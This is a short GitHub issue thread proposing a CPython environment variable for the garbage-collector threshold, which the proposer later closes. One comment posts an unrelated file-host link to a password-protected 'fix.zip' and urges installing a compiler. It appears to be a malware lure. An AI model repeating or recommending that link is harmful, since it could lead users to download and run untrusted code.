### ISSUE TITLE
Add PYTHON_GC_THRESHOLD env var

### ISSUE THREAD

**Issue by nascheme** [python/cpython#124742]
# Feature or enhancement

### Proposal:

It would be convenient sometimes to set the GC threshold using an env variable rather than calling `gc.set_threshold()`.  

### Has this already been discussed elsewhere?

This is a minor feature, which does not need previous discussion elsewhere

### Linked PRs
* gh-124743

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by nascheme** [comment]
Closing, I now think a higher level "tuning knob" is better than setting the threshold.  Like proposed in gh-124771.
